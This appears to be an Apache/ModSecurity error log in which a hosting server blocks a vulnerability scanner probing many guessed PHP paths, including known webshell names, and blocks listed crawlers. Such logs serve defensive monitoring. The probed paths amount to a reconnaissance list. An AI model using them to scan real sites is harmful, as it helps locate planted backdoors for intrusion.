[Tue May 26 13:12:29.920451 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:60350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/pki-validation/xmrlpc.php"] [unique_id "ahVO5evOeft4ltnLrH46dgAAAHM"]
[Tue May 26 13:12:30.089211 2026] [security2:error] [pid 496740:tid 496889] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO5evOeft4ltnLrH46ZAAAABM"]
[Tue May 26 13:12:30.219593 2026] [security2:error] [pid 496740:tid 496960] [client 4.204.220.190:9096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "traderscafe.in.jiyani.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVO5uvOeft4ltnLrH46hQAAAFo"]
[Tue May 26 13:12:30.219764 2026] [security2:error] [pid 496740:tid 496960] [client 4.204.220.190:9096] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "traderscafe.in.jiyani.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVO5uvOeft4ltnLrH46hQAAAFo"]
[Tue May 26 13:12:30.347313 2026] [security2:error] [pid 496740:tid 496921] [client 108.136.131.13:60586] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "agsnails.com"] [uri "/1.php"] [unique_id "ahVO5uvOeft4ltnLrH46iQAAADM"]
[Tue May 26 13:12:30.347428 2026] [security2:error] [pid 496740:tid 496921] [client 108.136.131.13:60586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/1.php"] [unique_id "ahVO5uvOeft4ltnLrH46iQAAADM"]
[Tue May 26 13:12:30.352724 2026] [security2:error] [pid 496740:tid 496986] [client 108.136.131.13:60578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/00.php"] [unique_id "ahVO5uvOeft4ltnLrH46igAAAHQ"]
[Tue May 26 13:12:30.357584 2026] [security2:error] [pid 496740:tid 496952] [client 108.136.131.13:60587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/10.php"] [unique_id "ahVO5uvOeft4ltnLrH46iwAAAFI"]
[Tue May 26 13:12:30.361353 2026] [security2:error] [pid 496740:tid 496898] [client 4.204.220.190:9143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "traderscafe.in.jiyani.in"] [uri "/about.php"] [unique_id "ahVO5uvOeft4ltnLrH46jAAAABw"]
[Tue May 26 13:12:30.361431 2026] [security2:error] [pid 496740:tid 496898] [client 4.204.220.190:9143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "traderscafe.in.jiyani.in"] [uri "/about.php"] [unique_id "ahVO5uvOeft4ltnLrH46jAAAABw"]
[Tue May 26 13:12:30.363708 2026] [security2:error] [pid 496740:tid 496936] [client 108.136.131.13:60585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/0byte.php"] [unique_id "ahVO5uvOeft4ltnLrH46jQAAAEI"]
[Tue May 26 13:12:30.365466 2026] [security2:error] [pid 496740:tid 496938] [client 108.136.131.13:60579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/01.php"] [unique_id "ahVO5uvOeft4ltnLrH46jgAAAEQ"]
[Tue May 26 13:12:30.787108 2026] [security2:error] [pid 496740:tid 496912] [client 108.136.131.13:60696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/2.php"] [unique_id "ahVO5uvOeft4ltnLrH46owAAACo"]
[Tue May 26 13:12:30.798025 2026] [security2:error] [pid 496740:tid 496935] [client 108.136.131.13:60697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/3.php"] [unique_id "ahVO5uvOeft4ltnLrH46pAAAAEE"]
[Tue May 26 13:12:30.802639 2026] [security2:error] [pid 496740:tid 496925] [client 108.136.131.13:60690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/100.php"] [unique_id "ahVO5uvOeft4ltnLrH46pQAAADc"]
[Tue May 26 13:12:30.802933 2026] [security2:error] [pid 496740:tid 496976] [client 108.136.131.13:60698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/4.php"] [unique_id "ahVO5uvOeft4ltnLrH46pgAAAGo"]
[Tue May 26 13:12:30.805225 2026] [security2:error] [pid 496740:tid 496997] [client 108.136.131.13:60692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/123.php"] [unique_id "ahVO5uvOeft4ltnLrH46pwAAAH8"]
[Tue May 26 13:12:31.230207 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:60948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/5.php"] [unique_id "ahVO5-vOeft4ltnLrH46uQAAAFo"]
[Tue May 26 13:12:31.236608 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:60938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/403.php"] [unique_id "ahVO5-vOeft4ltnLrH46uwAAAHc"]
[Tue May 26 13:12:31.242148 2026] [security2:error] [pid 496740:tid 496988] [client 108.136.131.13:60947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/406.php"] [unique_id "ahVO5-vOeft4ltnLrH46vAAAAHY"]
[Tue May 26 13:12:31.246889 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:60943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/404.php"] [unique_id "ahVO5-vOeft4ltnLrH46vQAAADo"]
[Tue May 26 13:12:31.248581 2026] [security2:error] [pid 496740:tid 496887] [client 108.136.131.13:60949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/500.php"] [unique_id "ahVO5-vOeft4ltnLrH46vgAAABE"]
[Tue May 26 13:12:31.305569 2026] [security2:error] [pid 496740:tid 496894] [client 120.233.111.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVO5-vOeft4ltnLrH46wQAAABg"]
[Tue May 26 13:12:31.445232 2026] [security2:error] [pid 496740:tid 496993] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVO5-vOeft4ltnLrH46ygAAAHs"], referer: https://www.ucdc.co.in/
[Tue May 26 13:12:31.448200 2026] [autoindex:error] [pid 496740:tid 496936] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 13:12:31.676995 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:61383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/8.php"] [unique_id "ahVO5-vOeft4ltnLrH462gAAAHg"]
[Tue May 26 13:12:31.678768 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:61349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/666.php"] [unique_id "ahVO5-vOeft4ltnLrH462wAAAAA"]
[Tue May 26 13:12:31.685510 2026] [security2:error] [pid 496740:tid 496907] [client 108.136.131.13:61384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/6.php"] [unique_id "ahVO5-vOeft4ltnLrH463AAAACU"]
[Tue May 26 13:12:31.687606 2026] [security2:error] [pid 496740:tid 496974] [client 108.136.131.13:61382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/777.php"] [unique_id "ahVO5-vOeft4ltnLrH463QAAAGg"]
[Tue May 26 13:12:31.689399 2026] [security2:error] [pid 496740:tid 496970] [client 108.136.131.13:61381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/7.php"] [unique_id "ahVO5-vOeft4ltnLrH463gAAAGQ"]
[Tue May 26 13:12:32.111796 2026] [security2:error] [pid 496740:tid 496955] [client 108.136.131.13:61848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/a1.php"] [unique_id "ahVO6OvOeft4ltnLrH466QAAAFU"]
[Tue May 26 13:12:32.117560 2026] [security2:error] [pid 496740:tid 496917] [client 108.136.131.13:61851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/about.php"] [unique_id "ahVO6OvOeft4ltnLrH466gAAAC8"]
[Tue May 26 13:12:32.117962 2026] [security2:error] [pid 496740:tid 496967] [client 108.136.131.13:61857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/9.php"] [unique_id "ahVO6OvOeft4ltnLrH466wAAAGE"]
[Tue May 26 13:12:32.129023 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:61849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/abc.php"] [unique_id "ahVO6OvOeft4ltnLrH467AAAAFw"]
[Tue May 26 13:12:32.131647 2026] [security2:error] [pid 496740:tid 496897] [client 108.136.131.13:61852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/admin.php"] [unique_id "ahVO6OvOeft4ltnLrH467QAAABs"]
[Tue May 26 13:12:32.421771 2026] [security2:error] [pid 496740:tid 496886] [client 43.173.132.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVO6OvOeft4ltnLrH47AAAAABA"]
[Tue May 26 13:12:32.548563 2026] [security2:error] [pid 496740:tid 496938] [client 216.244.66.241:49646] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/hypotonicityfefe/ddbcdf911291.shtml"] [unique_id "ahVO6OvOeft4ltnLrH47BAAAAEQ"]
[Tue May 26 13:12:32.548708 2026] [security2:error] [pid 496740:tid 496938] [client 216.244.66.241:49646] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/hypotonicityfefe/ddbcdf911291.shtml"] [unique_id "ahVO6OvOeft4ltnLrH47BAAAAEQ"]
[Tue May 26 13:12:32.557865 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:63093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alf.php"] [unique_id "ahVO6OvOeft4ltnLrH47BQAAAAQ"]
[Tue May 26 13:12:32.574663 2026] [security2:error] [pid 496740:tid 496936] [client 108.136.131.13:63095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alf4.php"] [unique_id "ahVO6OvOeft4ltnLrH47BwAAAEI"]
[Tue May 26 13:12:32.576024 2026] [security2:error] [pid 496740:tid 496978] [client 108.136.131.13:63085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/al.php"] [unique_id "ahVO6OvOeft4ltnLrH47CQAAAGw"]
[Tue May 26 13:12:32.583910 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:63108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alfa.php"] [unique_id "ahVO6OvOeft4ltnLrH47DAAAAFg"]
[Tue May 26 13:12:32.859765 2026] [security2:error] [pid 496740:tid 496893] [client 108.136.131.13:63083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/administrator.php"] [unique_id "ahVO6OvOeft4ltnLrH47BgAAABc"]
[Tue May 26 13:12:33.107402 2026] [security2:error] [pid 496740:tid 496945] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO6OvOeft4ltnLrH47EgAAAEs"]
[Tue May 26 13:12:33.278591 2026] [security2:error] [pid 496740:tid 496969] [client 108.136.131.13:65099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alpha.php"] [unique_id "ahVO6evOeft4ltnLrH47MAAAAGM"]
[Tue May 26 13:12:33.278858 2026] [security2:error] [pid 496740:tid 496955] [client 108.136.131.13:65100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alwso.php"] [unique_id "ahVO6evOeft4ltnLrH47MQAAAFU"]
[Tue May 26 13:12:33.286739 2026] [security2:error] [pid 496740:tid 496917] [client 108.136.131.13:65101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/anon.php"] [unique_id "ahVO6evOeft4ltnLrH47MgAAAC8"]
[Tue May 26 13:12:33.293233 2026] [security2:error] [pid 496740:tid 496967] [client 108.136.131.13:65094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alfanew.php"] [unique_id "ahVO6evOeft4ltnLrH47MwAAAGE"]
[Tue May 26 13:12:33.295069 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:65091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/alfa123.php"] [unique_id "ahVO6evOeft4ltnLrH47NAAAAFw"]
[Tue May 26 13:12:33.718774 2026] [security2:error] [pid 496740:tid 496939] [client 108.136.131.13:65276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/anons79.php"] [unique_id "ahVO6evOeft4ltnLrH47RAAAAEU"]
[Tue May 26 13:12:33.720316 2026] [security2:error] [pid 496740:tid 496872] [client 108.136.131.13:65283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/assets/css/about.php"] [unique_id "ahVO6evOeft4ltnLrH47RQAAAAI"]
[Tue May 26 13:12:33.720951 2026] [security2:error] [pid 496740:tid 496902] [client 108.136.131.13:65282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/asd.php"] [unique_id "ahVO6evOeft4ltnLrH47RgAAACA"]
[Tue May 26 13:12:33.725649 2026] [security2:error] [pid 496740:tid 496987] [client 108.136.131.13:65285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/atomlib.php"] [unique_id "ahVO6evOeft4ltnLrH47SAAAAHU"]
[Tue May 26 13:12:33.729497 2026] [security2:error] [pid 496740:tid 496974] [client 108.136.131.13:65278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/anonsec.php"] [unique_id "ahVO6evOeft4ltnLrH47SwAAAGg"]
[Tue May 26 13:12:33.963526 2026] [proxy:error] [pid 496740:tid 496979] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:12:33.963582 2026] [proxy_http:error] [pid 496740:tid 496979] [client 87.236.176.79:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:12:33.964199 2026] [proxy:error] [pid 496740:tid 496979] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:12:33.964233 2026] [proxy_http:error] [pid 496740:tid 496979] [client 87.236.176.79:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:12:34.195701 2026] [security2:error] [pid 496740:tid 496954] [client 108.136.131.13:49479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/b.php"] [unique_id "ahVO6uvOeft4ltnLrH47ZwAAAFQ"]
[Tue May 26 13:12:34.197466 2026] [security2:error] [pid 496740:tid 496929] [client 108.136.131.13:49480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/bak.php"] [unique_id "ahVO6uvOeft4ltnLrH47aAAAADs"]
[Tue May 26 13:12:34.198176 2026] [security2:error] [pid 496740:tid 496877] [client 108.136.131.13:49483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/base.php"] [unique_id "ahVO6uvOeft4ltnLrH47aQAAAAc"]
[Tue May 26 13:12:34.202656 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:49486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/batm.php"] [unique_id "ahVO6uvOeft4ltnLrH47awAAAHc"]
[Tue May 26 13:12:34.214674 2026] [security2:error] [pid 496740:tid 496988] [client 108.136.131.13:49478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/autoload_classmap.php"] [unique_id "ahVO6uvOeft4ltnLrH47bAAAAHY"]
